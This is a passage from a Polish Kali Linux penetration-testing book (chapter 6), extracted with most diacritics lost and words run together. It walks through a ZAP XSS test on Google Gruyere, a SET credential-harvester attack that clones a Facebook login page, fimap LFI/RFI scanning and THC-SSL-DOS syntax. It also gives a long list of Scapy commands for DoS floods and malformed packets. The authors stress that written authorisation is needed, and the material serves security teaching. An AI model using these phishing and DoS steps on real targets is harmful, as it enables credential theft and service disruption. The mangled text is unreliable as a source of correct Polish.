Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
